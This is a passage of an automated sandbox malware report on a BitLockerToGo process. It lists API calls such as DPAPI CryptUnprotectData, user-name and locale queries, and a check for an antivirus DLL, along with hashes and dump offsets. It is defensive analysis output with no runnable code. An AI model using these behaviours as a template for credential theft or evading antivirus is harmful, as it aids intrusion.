                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: /
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d4126c130fc34069db6be0a835c30a16121410ed5bb383f9289b4bfa92103ced
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d901ecd4ae127174b3e7df9517b74993cc4e235575160658c74ebf496cf25eed
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4126c130fc34069db6be0a835c30a16121410ed5bb383f9289b4bfa92103ced
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE31E8B5D80238ABDB20AF64DD89B9EB3B9AF04310F1045E5AE19A7151CF74AE85CF50
                                                                                                                                                                                                                                                                                                                                                          Function 02A133B3 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 02A133BA
                                                                                                                                                                                                                                                                                                                                                          • CoCreateInstance.COMBASE(02A34220,00000000,00000001,02A3C17C,?), ref: 02A133DD
                                                                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 02A133EA
                                                                                                                                                                                                                                                                                                                                                          • _wtoi64.MSVCRT ref: 02A1341D
                                                                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 02A13436
                                                                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02A1343D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 181426013-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 47b414535b204f5724bded179d0e6c6964c2b4a4e0ac23b28c09f4b27878cc05
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3f82913ace939c05676e2ae697fef890c225270102f04fe28128f982aae1c5e7
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47b414535b204f5724bded179d0e6c6964c2b4a4e0ac23b28c09f4b27878cc05
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D117670D4024AEFCF029FA4D8899AEBFB6BF49311F1444A9F106E7250CF308946CBA4
                                                                                                                                                                                                                                                                                                                                                          Function 02A092A6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,02A09456), ref: 02A092C9
                                                                                                                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,02A09456,?,?,02A09456,?,02A0DC56,?,?,?,?,?,?), ref: 02A092DD
                                                                                                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,02A09456,?,02A0DC56,?,?,?,?,?,?), ref: 02A09302
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                                                                                                                          • String ID: DPAPI
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2068576380-1690256801
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4dd3e9c2a638769cfa072677b95dadcf6b715288c21b15e76a9bda288d4a37af
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2754f5d6e413b066e35e1314bc4bcf78a547ca55321bfdfe5cd8e980c578759b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dd3e9c2a638769cfa072677b95dadcf6b715288c21b15e76a9bda288d4a37af
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2801E8BAA01219AFCB00DFA8D9849AEBBF9EB4C714B104465FD05E7340D770AE50CB90
                                                                                                                                                                                                                                                                                                                                                          Function 02A13AB9 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,02A0543A,?,?,?,?), ref: 02A13AD9
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 02A13AE6
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A13AED
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateBinaryCryptProcessString
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 869800140-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d64bd301d0528eddc162d21840de3646acb0355afd08ceeb68f2fd2bfd709ee0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f6dab561fccf5a389db5755818d8f0584ecb5f02df01c1fcb0f59295315b3337
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d64bd301d0528eddc162d21840de3646acb0355afd08ceeb68f2fd2bfd709ee0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71015E74500208BFDF119F61DC89DAF7FFDFF49264B148558F90582110DB319950EB60
                                                                                                                                                                                                                                                                                                                                                          Function 02A1298A Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A129A5
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A129AC
                                                                                                                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 02A129BB
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A129D9
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3317088062-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4869412f01ab9377e344777f6443525e32bd5681dc952ba13d83ae75bdec70be
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9c611731fa620aa8d7d8b1fbcf97e8d32ec85a14d312234fbdcdf45404d99303
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4869412f01ab9377e344777f6443525e32bd5681dc952ba13d83ae75bdec70be
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADF0B471E402246BE7149B78AC4ABAB77E9BB04324F100655FD15D31C0DF709E148A92
                                                                                                                                                                                                                                                                                                                                                          Function 02A128AF Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A013A9), ref: 02A128BB
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A128C2
                                                                                                                                                                                                                                                                                                                                                          • GetUserNameA.ADVAPI32(00000000,02A013A9), ref: 02A128D6
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateNameProcessUser
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1296208442-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 74dc4bd83cf9aa5dcd56bc4f3a0b8fa696b9f0188676c70dc560280499faaad1
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c263daba188f06b29f9a0928b4898420bfba0bab6bdee13330a96e281e9c6f16
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74dc4bd83cf9aa5dcd56bc4f3a0b8fa696b9f0188676c70dc560280499faaad1
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABD05BB5A40344BBD7005795DC4DE8A77BCD785715F000456F60AE2140DDF0D9498630
                                                                                                                                                                                                                                                                                                                                                          Function 02A12C16 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 44006b328e82fe4160e255b67f8441007c7addbf9fb91c613739c0b0510b1e67
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7b0a2b2e2ea9045c2ab7afb544f7cdb631ac739fbbeb9d6e87ae610effa9de66
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44006b328e82fe4160e255b67f8441007c7addbf9fb91c613739c0b0510b1e67
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13E09270D5021C9BDB11DFA0ED45ADEB7FCAB08304F0005B5A905D3180DA70AF98CF81
                                                                                                                                                                                                                                                                                                                                                          Function 02A0149D Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?,?,?,?,?,02A014F3,avghookx.dll,02A19D23), ref: 02A014CF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1586166983-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 81fec3f31af21358694e639fafd18194f2d7ca6d52389c82a52e390fe23ffbba
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3bc7c6a3ca284a44de9ecd6c4606d7d46365fe44ba0b288dfdfe7adeef75f978
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81fec3f31af21358694e639fafd18194f2d7ca6d52389c82a52e390fe23ffbba
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24F05876A00110ABCF20CF59E844BEAFBB8EB43764F156054E809B3250CB31E911DA98
                                                                                                                                                                                                                                                                                                                                                          Function 02A053AA Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573stringnetworkmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                          • Not Executed
